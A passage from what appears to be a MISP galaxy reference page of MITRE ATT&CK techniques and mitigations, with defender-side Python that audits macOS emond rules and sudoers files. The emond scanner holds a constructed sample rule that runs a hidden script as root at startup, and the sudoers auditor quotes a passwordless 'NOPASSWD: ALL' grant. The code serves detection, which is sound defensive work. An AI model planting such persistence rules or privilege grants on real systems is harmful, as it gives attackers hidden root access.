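import plistlib
from pathlib import Path
from typing import Dict, List

# Constructed sample rule file: one rule runs a script as root at startup,
# the other only writes a log line on successful authentication.
SAMPLE_RULE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<array>
  <dict>
    <key>name</key><string>sample-startup-task</string>
    <key>enabled</key><true/>
    <key>eventTypes</key><array><string>startup</string></array>
    <key>actions</key>
    <array><dict>
      <key>type</key><string>RunCommand</string>
      <key>command</key><string>/Users/Shared/.update.sh</string>
      <key>user</key><string>root</string>
      <key>arguments</key><array><string>--quiet</string></array>
    </dict></array>
  </dict>
  <dict>
    <key>name</key><string>sample-auth-log</string>
    <key>enabled</key><true/>
    <key>eventTypes</key><array><string>auth.success</string></array>
    <key>actions</key>
    <array><dict>
      <key>type</key><string>Log</string>
      <key>message</key><string>login observed</string>
    </dict></array>
  </dict>
</array>
</plist>
"""

# Locations any local user can write to; a command there deserves a closer
# look. Chosen for this demo, not an emond setting.
USER_WRITABLE_PREFIXES = ("/Users/", "/tmp/", "/private/tmp/", "/var/tmp/")
INTERPRETERS = ("/bin/sh", "/bin/bash", "/bin/zsh", "/usr/bin/osascript",
                "/usr/bin/python", "/usr/bin/python3")


def command_rules(plist_bytes: bytes) -> List[Dict]:
    """Return one record per RunCommand action found in a rule plist."""
    rules = plistlib.loads(plist_bytes)
    if isinstance(rules, dict):        # a file may hold a single rule dict
        rules = [rules]
    records = []
    for rule in rules:
        for action in rule.get("actions", []):
            if action.get("type") != "RunCommand":
                continue
            cmd = str(action.get("command", ""))
            args = [str(a) for a in action.get("arguments", [])]
            flags = []
            if not rule.get("enabled", True):
                flags.append("disabled")
            # emond itself runs as root, so a missing user is treated as root
            if action.get("user", "root") == "root":
                flags.append("runs-as-root")
            if cmd.startswith(USER_WRITABLE_PREFIXES):
                flags.append("command-in-user-writable-path")
            if cmd in INTERPRETERS and any(a in ("-c", "-e") for a in args):
                flags.append("inline-script-argument")
            records.append({"name": str(rule.get("name", "?")),
                            "events": [str(e) for e in rule.get("eventTypes", [])],
                            "command": cmd, "arguments": args, "flags": flags})
    return records


def scan_rules_dir(path: str = "/etc/emond.d/rules") -> List[Dict]:
    """Run command_rules over every .plist in an emond rules directory."""
    findings: List[Dict] = []
    for p in sorted(Path(path).glob("*.plist")):
        try:
            findings.extend(command_rules(p.read_bytes()))
        except (plistlib.InvalidFileException, ValueError) as exc:
            findings.append({"name": p.name, "error": str(exc)})
    return findings


if __name__ == "__main__":
    for rec in command_rules(SAMPLE_RULE_PLIST):
        print(rec["name"], rec["events"], rec["command"], rec["arguments"], rec["flags"])
```

Running `scan_rules_dir()` on a macOS host lists the live rules; a RunCommand rule for the startup or authentication event types that is not Apple's own sample is a candidate for this technique.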

The tag is: misp-galaxy:mitre-attack-pattern="Emond - T1519"

Table 6434. Table References

Links

http://www.magnusviri.com/Mac/what-is-emond.html

https://attack.mitre.org/techniques/T1519

https://www.sentinelone.com/blog/how-malware-persists-on-macos/

https://www.xorrior.com/emond-persistence/

Hooking - T1617

Adversaries may utilize hooking to hide the presence of artifacts associated with their behaviors to evade detection. Hooking can be used to modify return values or data structures of system APIs and function calls. This process typically involves using 3rd party root frameworks, such as Xposed or Magisk, with either a system exploit or pre-existing root access. By including custom modules for root frameworks, adversaries can hook system APIs and alter the return value and/or system data structures to alter functionality/visibility of various aspects of the system.

The tag is: misp-galaxy:mitre-attack-pattern="Hooking - T1617"

Table 6435. Table References

Links

https://attack.mitre.org/techniques/T1617

Sudo - T1169

The sudoers file, <code>/etc/sudoers</code>, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the idea of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like <code>user1 ALL=(ALL) NOPASSWD: ALL</code> (Citation: OSX.Dok Malware).

Adversaries can take advantage of these configurations to execute commands as other users or spawn processes with higher privileges. Elevated privileges are required to edit this file, however.
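An added defender-side example (not code from the MISP galaxy page or MITRE ATT&CK) that audits a sudoers file for the kind of passwordless grant quoted above: it parses user-specification lines, joins backslash continuations, skips Defaults and alias definitions, and ranks NOPASSWD rules that allow ALL commands above scoped ones. The sudoers text is constructed for the demo; alias expansion is out of scope.

```python
"""Audit sudoers user specifications for passwordless grants.

Added defender-side example; not code from the MISP galaxy page or
MITRE ATT&CK. Parses user-specification lines of a sudoers file
(Defaults and alias lines skipped, continuation lines joined) and
reports NOPASSWD rules, unrestricted "ALL" grants first. The sudoers
text below is constructed and includes the line quoted on the page.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

SAMPLE_SUDOERS = """\
# constructed sample /etc/sudoers
Defaults env_reset
User_Alias ADMINS = alice, bob
Cmnd_Alias SERVICES = /usr/sbin/service, /bin/systemctl

root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
user1   ALL=(ALL) NOPASSWD: ALL
ADMINS  ALL=(root) NOPASSWD: SERVICES
deploy  web01=(www) NOPASSWD: /usr/bin/systemctl restart nginx, \\
        /usr/bin/systemctl reload nginx
carol   ALL=(ALL) PASSWD: /usr/bin/less
"""


@dataclass
class SudoRule:
    user: str            # user name, %group, or User_Alias name
    hosts: str
    runas: str           # contents of the (...) clause; "root" when omitted
    nopasswd: bool
    commands: List[str]  # command list, or ["ALL"]
    line_no: int


# user  hosts = (runas) [TAG: ...] command, command, ...
_RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<hosts>\S+?)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$")
_TAGS = {"NOPASSWD:", "PASSWD:", "NOEXEC:", "EXEC:", "SETENV:", "NOSETENV:",
         "LOG_INPUT:", "NOLOG_INPUT:", "LOG_OUTPUT:", "NOLOG_OUTPUT:"}
_SKIP = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")


def _logical_lines(text: str):
    """Yield (first_line_no, text) with backslash-continued lines joined."""
    buf: List[str] = []
    start = 0
    for no, raw in enumerate(text.splitlines(), 1):
        if not buf:
            start = no
        stripped = raw.rstrip()
        if stripped.endswith("\\"):
            buf.append(stripped[:-1])
            continue
        buf.append(stripped)
        yield start, " ".join(part.strip() for part in buf)
        buf = []


def parse_sudoers(text: str) -> List[SudoRule]:
    """Parse user specifications; comments, Defaults and aliases are skipped."""
    rules = []
    for line_no, line in _logical_lines(text):
        line = line.strip()
        if not line or line.startswith("#") or line.startswith(_SKIP):
            continue
        m = _RULE_RE.match(line)
        if not m:
            continue   # not a user specification; ignored by this audit
        tags, commands = set(), []
        for part in m.group("rest").split(","):
            words = part.split()
            # tags such as NOPASSWD: precede the command they apply to
            while words and words[0] in _TAGS:
                tags.add(words.pop(0))
            if words:
                commands.append(" ".join(words))
        rules.append(SudoRule(m.group("user"), m.group("hosts"),
                              m.group("runas") or "root",
                              "NOPASSWD:" in tags, commands, line_no))
    return rules


def find_nopasswd(rules: List[SudoRule]) -> List[Dict]:
    """NOPASSWD rules, highest risk first: an ALL command list beats a scoped one."""
    findings = []
    for r in rules:
        if not r.nopasswd:
            continue
        findings.append({"line": r.line_no, "user": r.user, "hosts": r.hosts,
                         "runas": r.runas, "commands": r.commands,
                         "severity": "high" if "ALL" in r.commands else "medium"})
    findings.sort(key=lambda f: (f["severity"] != "high", f["line"]))
    return findings


if __name__ == "__main__":
    for f in find_nopasswd(parse_sudoers(SAMPLE_SUDOERS)):
        print(f"{f['severity']:<6} line {f['line']:>3}: {f['user']} as "
              f"({f['runas']}) -> {', '.join(f['commands'])}")
```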

The tag is: misp-galaxy:mitre-attack-pattern="Sudo - T1169"

Table 6436. Table References

Links

https://attack.mitre.org/techniques/T1169

https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/

Hooking - T1179

Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions.

Hooking involves redirecting calls to these functions and can be implemented via:

  • Hook procedures, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs. (Citation: Microsoft Hook Overview) (Citation: Elastic Process Injection July 2017)

  • Import address table (IAT) hooking, which uses modifications to a process’s IAT, where pointers to imported API functions are stored. (Citation: Elastic Process Injection July 2017) (Citation: Adlice Software IAT Hooks Oct 2014) (Citation: MWRInfoSecurity Dynamic Hooking 2015)

  • Inline hooking, which overwrites the first bytes in an API function to redirect code flow. (Citation: Elastic Process Injection July 2017) (Citation: HighTech Bridge Inline Hooking Sept 2011) (Citation: MWRInfoSecurity Dynamic Hooking 2015)

Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), adversaries may use hooking to load and execute malicious code within the context of another process, masking the execution while also allowing access to the process’s memory and possibly elevated privileges. Installing hooking mechanisms may also provide Persistence via continuous invocation when the functions are called through normal use.

Malicious hooking mechanisms may also capture API calls that include parameters that reveal user authentication credentials for Credential Access. (Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017)

Hooking is commonly utilized by [Rootkit](https://attack.mitre.org/techniques/T1014)s to conceal files, processes, Registry keys, and other objects in order to hide malware and associated behaviors. (Citation: Symantec Windows Rootkits)

The tag is: misp-galaxy:mitre-attack-pattern="Hooking - T1179"

Table 6437. Table References

Links

http://www.gmer.net/

https://attack.mitre.org/techniques/T1179

https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/

https://github.com/jay/gethooks

https://github.com/prekageo/winhook

https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx

https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx

https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis

https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html

https://www.adlice.com/userland-rootkits-part-1-iat-hooks/

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://www.exploit-db.com/docs/17802.pdf

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918

https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/

https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf

https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/

DNSCalc - T1324

This technique has been deprecated. Please use [DNS Calculation](https://attack.mitre.org/techniques/T1568/003).

DNS Calc is a technique in which the octets of an IP address are used to calculate the port for command and control servers from an initial DNS request. (Citation: CrowdstrikeNumberedPanda) (Citation: FireEyeDarwinsAPTGroup) (Citation: Rapid7G20Espionage)

The tag is: misp-galaxy:mitre-attack-pattern="DNSCalc - T1324"

Table 6438. Table References

Links

https://attack.mitre.org/techniques/T1324

https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/

Masquerading - T1655

Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name, location, or appearance of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.

Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1655).

The tag is: misp-galaxy:mitre-attack-pattern="Masquerading - T1655"

Table 6439. Table References

Links

https://attack.mitre.org/techniques/T1655

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-14.html

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.html

Impersonation - T1656

Adversaries may impersonate a trusted person or organization in order to persuade and trick a target into performing some action on their behalf. For example, adversaries may communicate with victims (via [Phishing for Information](https://attack.mitre.org/techniques/T1598), [Phishing](https://attack.mitre.org/techniques/T1566), or [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)) while impersonating a known sender such as an executive, colleague, or third-party vendor. Established trust can then be leveraged to accomplish an adversary’s ultimate goals, possibly against multiple victims.

In many cases of business email compromise or email fraud campaigns, adversaries use impersonation to defraud victims — deceiving them into sending money or divulging information that ultimately enables [Financial Theft](https://attack.mitre.org/techniques/T1657).

Adversaries will often also use social engineering techniques such as manipulative and persuasive language in email subject lines and body text such as payment, request, or urgent to push the victim to act quickly before malicious activity is detected. These campaigns are often specifically targeted against people who, due to job roles and/or accesses, can carry out the adversary’s goal.

Impersonation is typically preceded by reconnaissance techniques such as [Gather Victim Identity Information](https://attack.mitre.org/techniques/T1589) and [Gather Victim Org Information](https://attack.mitre.org/techniques/T1591) as well as acquiring infrastructure such as email domains (i.e. [Domains](https://attack.mitre.org/techniques/T1583/001)) to substantiate their false identity.(Citation: CrowdStrike-BEC)

There is the potential for multiple victims in campaigns involving impersonation. For example, an adversary may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) targeting one organization which can then be used to support impersonation against other entities.(Citation: VEC)

The tag is: misp-galaxy:mitre-attack-pattern="Impersonation - T1656"

Table 6440. Table References

Links

https://attack.mitre.org/techniques/T1656

https://www.cloudflare.com/learning/email-security/what-is-vendor-email-compromise/::text=Vendor%20email%20compromise%2C%20also%20referred

https://www.crowdstrike.com/cybersecurity-101/business-email-compromise-bec/

Phishing - T1566

Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.

Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce)

Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)

The tag is: misp-galaxy:mitre-attack-pattern="Phishing - T1566"

Table 6441. Table References

Links

https://attack.mitre.org/techniques/T1566

https://blog.cyberproof.com/blog/double-bounced-attacks-with-email-spoofing-2022-trends

https://blog.sygnia.co/luna-moth-false-subscription-scams

https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide

https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/

https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/

https://www.cisa.gov/uscert/ncas/alerts/aa23-025a

https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf

https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/

https://www.proofpoint.com/us/threat-reference/email-spoofing

Keychain - T1579

Adversaries may collect the keychain storage data from an iOS device to acquire credentials. Keychains are the built-in way for iOS to keep track of users' passwords and credentials for many services and features such as Wi-Fi passwords, websites, secure notes, certificates, private keys, and VPN credentials.

On the device, the keychain database is stored outside of application sandboxes to prevent unauthorized access to the raw data. Standard iOS APIs allow applications access to their own keychain contained within the database. By utilizing a privilege escalation exploit or existing root access, an adversary can access the entire encrypted database.(Citation: Apple Keychain Services)(Citation: Elcomsoft Decrypt Keychain)

The tag is: misp-galaxy:mitre-attack-pattern="Keychain - T1579"

Table 6442. Table References

Links

https://attack.mitre.org/techniques/T1579

https://blog.elcomsoft.com/2018/12/six-ways-to-decrypt-iphone-passwords-from-the-keychain/

https://developer.apple.com/documentation/security/keychain_services

https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-11.html

Course of Action

ATT&CK Mitigation.

Course of Action is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

MITRE

Registry Run Keys / Startup Folder Mitigation - T1060

Identify and block potentially malicious software that may be executed through run key or startup folder persistence using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Registry Run Keys / Startup Folder Mitigation - T1060"

Registry Run Keys / Startup Folder Mitigation - T1060 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1060" with estimative-language:likelihood-probability="almost-certain"

Table 6443. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1060

https://technet.microsoft.com/en-us/library/ee791851.aspx

Exfiltration Over Command and Control Channel Mitigation - T1041

Mitigations for command and control apply. Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool command and control signatures over time or construct protocols in such a way to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Exfiltration Over Command and Control Channel Mitigation - T1041"

Exfiltration Over Command and Control Channel Mitigation - T1041 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

Table 6444. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1041

Exfiltration Over Other Network Medium Mitigation - T1011

Ensure host-based sensors maintain visibility into usage of all network adapters and prevent the creation of new ones where possible. (Citation: Microsoft GPO Bluetooth FEB 2009) (Citation: TechRepublic Wireless GPO FEB 2009)

The tag is: misp-galaxy:mitre-course-of-action="Exfiltration Over Other Network Medium Mitigation - T1011"

Table 6445. Table References

Links

https://attack.mitre.org/mitigations/T1011

https://technet.microsoft.com/library/dd252791.aspx

https://www.techrepublic.com/blog/data-center/configuring-wireless-settings-via-group-policy/

Disable or Remove Feature or Program - M1042

Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.

The tag is: misp-galaxy:mitre-course-of-action="Disable or Remove Feature or Program - M1042"

Table 6446. Table References

Links

https://attack.mitre.org/mitigations/M1042

Limit Access to Resource Over Network - M1035

Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.

The tag is: misp-galaxy:mitre-course-of-action="Limit Access to Resource Over Network - M1035"

Table 6447. Table References

Links

https://attack.mitre.org/mitigations/M1035

Data from Network Shared Drive Mitigation - T1039

Identify unnecessary system utilities or potentially malicious software that may be used to collect data from a network share, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Data from Network Shared Drive Mitigation - T1039"

Data from Network Shared Drive Mitigation - T1039 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Data from Network Shared Drive - T1039" with estimative-language:likelihood-probability="almost-certain"

Table 6448. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1039

https://technet.microsoft.com/en-us/library/ee791851.aspx

Windows Management Instrumentation Event Subscription Mitigation - T1084

Disabling WMI services may cause system instability and should be evaluated to assess the impact to a network. By default, only administrators are allowed to connect remotely using WMI; restrict other users that are allowed to connect, or disallow all users from connecting remotely to WMI. Prevent credential overlap across systems of administrator and privileged accounts. (Citation: FireEye WMI 2015)

The tag is: misp-galaxy:mitre-course-of-action="Windows Management Instrumentation Event Subscription Mitigation - T1084"

Windows Management Instrumentation Event Subscription Mitigation - T1084 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1084" with estimative-language:likelihood-probability="almost-certain"

Table 6449. Table References

Links

https://attack.mitre.org/mitigations/T1084

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf

Custom Command and Control Protocol Mitigation - T1094

Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports and through proper network gateway systems. Also ensure hosts are only provisioned to communicate over authorized interfaces.

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Custom Command and Control Protocol Mitigation - T1094"

Custom Command and Control Protocol Mitigation - T1094 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"

Table 6450. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1094

Image File Execution Options Injection Mitigation - T1183

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating all IFEO will likely have unintended side effects, such as preventing legitimate software (i.e., security products) from operating properly. (Citation: Microsoft IFEOorMalware July 2015) Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.

Identify and block potentially malicious software that may be executed through IFEO by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown executables.

The tag is: misp-galaxy:mitre-course-of-action="Image File Execution Options Injection Mitigation - T1183"

Image File Execution Options Injection Mitigation - T1183 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Image File Execution Options Injection - T1183" with estimative-language:likelihood-probability="almost-certain"

Table 6451. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://answers.microsoft.com/windows/forum/windows_10-security/part-of-windows-10-or-really-malware/af715663-a34a-423c-850d-2a46f369a54c

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1183

SIP and Trust Provider Hijacking Mitigation - T1198

Ensure proper permissions are set for Registry hives to prevent users from modifying keys related to SIP and trust provider components. Also ensure that these values contain their full path to prevent [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038). (Citation: SpectorOps Subverting Trust Sept 2017)

Consider removing unnecessary and/or stale SIPs. (Citation: SpectorOps Subverting Trust Sept 2017)

Restrict storage and execution of SIP DLLs to protected directories, such as C:\Windows, rather than user directories.

Enable whitelisting solutions such as AppLocker and/or Device Guard to block the loading of malicious SIP DLLs. Components may still be able to be hijacked to suitable functions already present on disk if malicious modifications to Registry keys are not prevented.

The tag is: misp-galaxy:mitre-course-of-action="SIP and Trust Provider Hijacking Mitigation - T1198"

SIP and Trust Provider Hijacking Mitigation - T1198 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="SIP and Trust Provider Hijacking - T1198" with estimative-language:likelihood-probability="almost-certain"

Table 6452. Table References

Links

https://attack.mitre.org/mitigations/T1198

https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf

Standard Non-Application Layer Protocol Mitigation - T1095

Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports and through proper network gateway systems. Also ensure hosts are only provisioned to communicate over authorized interfaces.

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Standard Non-Application Layer Protocol Mitigation - T1095"

Standard Non-Application Layer Protocol Mitigation - T1095 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"

Table 6453. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1095

Deobfuscate/Decode Files or Information Mitigation - T1140

Identify unnecessary system utilities or potentially malicious software that may be used to deobfuscate or decode files or information, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Deobfuscate/Decode Files or Information Mitigation - T1140"

Deobfuscate/Decode Files or Information Mitigation - T1140 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

Table 6454. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1140

https://technet.microsoft.com/en-us/library/ee791851.aspx

Deploy Compromised Device Detection Method - M1010

A variety of methods exist that can be used to enable enterprises to identify compromised (e.g. rooted/jailbroken) devices, whether using security mechanisms built directly into the device, third-party mobile security applications, enterprise mobility management (EMM)/mobile device management (MDM) capabilities, or other methods. Some methods may be trivial to evade while others may be more sophisticated.

The tag is: misp-galaxy:mitre-course-of-action="Deploy Compromised Device Detection Method - M1010"

Deploy Compromised Device Detection Method - M1010 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Device Lockout - T1446" with estimative-language:likelihood-probability="almost-certain"

Table 6455. Table References

Links

https://attack.mitre.org/mitigations/M1010

Data Transfer Size Limits Mitigation - T1030

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool command and control signatures over time or construct protocols in such a way to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Data Transfer Size Limits Mitigation - T1030"

Data Transfer Size Limits Mitigation - T1030 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Data Transfer Size Limits - T1030" with estimative-language:likelihood-probability="almost-certain"

Table 6456. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1030

Data from Local System Mitigation - T1005

Identify unnecessary system utilities or potentially malicious software that may be used to collect data from the local system, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Data from Local System Mitigation - T1005"

Data from Local System Mitigation - T1005 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

Table 6457. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1005

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

File System Logical Offsets Mitigation - T1006

Identify potentially malicious software that may be used to access logical drives in this manner, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="File System Logical Offsets Mitigation - T1006"

File System Logical Offsets Mitigation - T1006 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Direct Volume Access - T1006" with estimative-language:likelihood-probability="almost-certain"

Table 6458. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1006

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

